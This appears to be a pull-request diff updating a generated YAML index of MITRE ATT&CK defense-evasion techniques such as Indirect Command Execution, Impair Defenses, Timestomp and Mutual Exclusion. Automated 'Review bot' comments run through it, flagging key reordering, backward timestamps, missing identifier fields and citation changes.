- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
T1140:
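Review bot: the three citation keys newly referenced in the T1202 description (`Secure Team - Scriptrunner.exe`, `SS64`, `Bleeping Computer - Scriptrunner.exe`) each have a matching `external_references` entry in this hunk, so the description does not dangle, and the `'1.1'` to `'1.2'` bump plus the added contributor line up with it. Two things to be aware of: the rest of the hunk is the same key reordering seen for T1556.002, and the two Twitter references are rewritten from `twitter.com` to `x.com` with new retrieved dates, so anything that dedupes references by URL will now see the old and new forms as different entries.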
@@ -3402,22 +3470,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests: []
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
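Review bot: the block indicator for the T1562 description changes from `|-` to `|+`, so the string now keeps its trailing newline(s) instead of having them stripped; the emitter picks `|+` because the source string ends in a newline, which is faithful to upstream, but a consumer that renders the description verbatim will pick up trailing blank lines. Content-wise, the two former paragraphs (blocking logout and shutdown; targeting event aggregation) are merged into one with the update-process sentence and the UNC3886 citation added, and `x_mitre_attack_spec_version: 3.2.0` moves up here from the bottom of the object rather than being a new value.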
@@ -3426,15 +3496,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests: []
T1055.003:
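Review bot: the new `Google Cloud Mandiant UNC3886 2024` reference has a double-quoted description that starts with a space (`" Punsaen Boonyakarn, ...`), carried over from the upstream object. It is harmless for rendering, but do not hand-trim it in this generated file or the next regeneration will put it back; if it matters, it is an upstream data fix. The `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines removed at the bottom of this hunk are the same values inserted higher in the object in the two hunks above, so no field is lost.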
@@ -3504,7 +3578,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
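Review bot: the `modified` value for T1055.003 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-10-18T12:22:50.800Z`, and the same regression shows up below for T1055, T1205, T1218.002, T1599.001 and T1553.003. A timestamp going backwards on a regenerated index is usually a sign of pulling an older snapshot rather than a newer one, so please confirm these values match the upstream bundle being targeted; if the earlier `...14:00:00.188Z` stamps were synthetic and the new ones are the real upstream values, say so in the commit message so nobody treats this as a rollback.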
@@ -3552,13 +3626,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
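Review bot: T1055.003 loses both `spec_version` and `x_mitre_attack_spec_version` in this hunk with nothing added in their place, whereas T1562 above keeps `x_mitre_attack_spec_version: 3.2.0`. If any consumer reads `x_mitre_attack_spec_version` to decide how to parse an object, it now has to handle the key being absent for some techniques and present for others; either confirm upstream really has no value for this object or have the reader default safely when the key is missing.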
@@ -3574,7 +3646,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
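Review bot: T1205 has no `identifier` key: the object goes straight from `x_mitre_modified_by_ref` to `atomic_tests: []`, while T1218 immediately below carries `identifier: T1218`. The same omission is visible later for T1564.011, T1599.001, T1550 and T1556.007. These are unchanged context lines, so it is pre-existing, but since this PR already touches every object it is the natural place to normalize the shape, and any code that looks up `technique.identifier` will otherwise need a fallback to the map key.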
@@ -3978,60 +4046,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests: []
T1620:
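Review bot: in the T1070.006 rewrite, `x_mitre_permissions_required` (`root`, `SYSTEM`, `User`) is deleted and not re-added anywhere in the hunk, while the new data sources `Process: OS API Execution` and `Command: Command Execution` are added. If this mirrors upstream verbatim that is fine, but anything in this repo that filters or displays permissions for a technique should be checked for a missing key. Also worth noting for readers of the new description: it now distinguishes `$STANDARD_INFORMATION` and `$FILE_NAME` timestamps and "double timestomping", yet `x_mitre_detection` is unchanged and still cites only the 2013 WindowsIR post; the `$SI`/`$FN` mismatch check that the newly added Inversecos and Magnet Forensics references describe is the practical detection, so if the repo ever adds an atomic test for this technique, that comparison is the assertion it should make.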
@@ -4134,9 +4219,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
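Review bot: the newly added T1480.002 (Mutual Exclusion) object ends with `x_mitre_modified_by_ref` followed directly by `atomic_tests: []` and has no `identifier: T1480.002` line, unlike the neighbouring T1620 which carries `identifier: T1620`; please add it so the new entry matches the existing shape. `x_mitre_detection: ''` is empty, which is how upstream ships it, but the data sources listed (`Process: OS API Execution`, `File: File Creation`) already point at the observable: mutex creation API calls on Windows and lock-file creation on Linux, per the description's RedXOR and BPFDoor citations. `atomic_tests: []` is expected for a technique this new; a follow-up test that creates a named mutex and exits on second launch would be the obvious first atomic.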
@@ -4200,57 +4352,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
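Review bot: most of this hunk is not a content change: the T1497.003 object is deleted and re-emitted almost in full because the generator now writes keys in a different order (the same thing happened to T1070.006 above). That makes a one-line change such as a new `modified` value read as a fifty-line rewrite and hides the real edits. Please have the exporter serialize keys in a fixed order (for example the upstream STIX property order) so future regenerations produce minimal diffs.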
@@ -4265,6 +4370,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
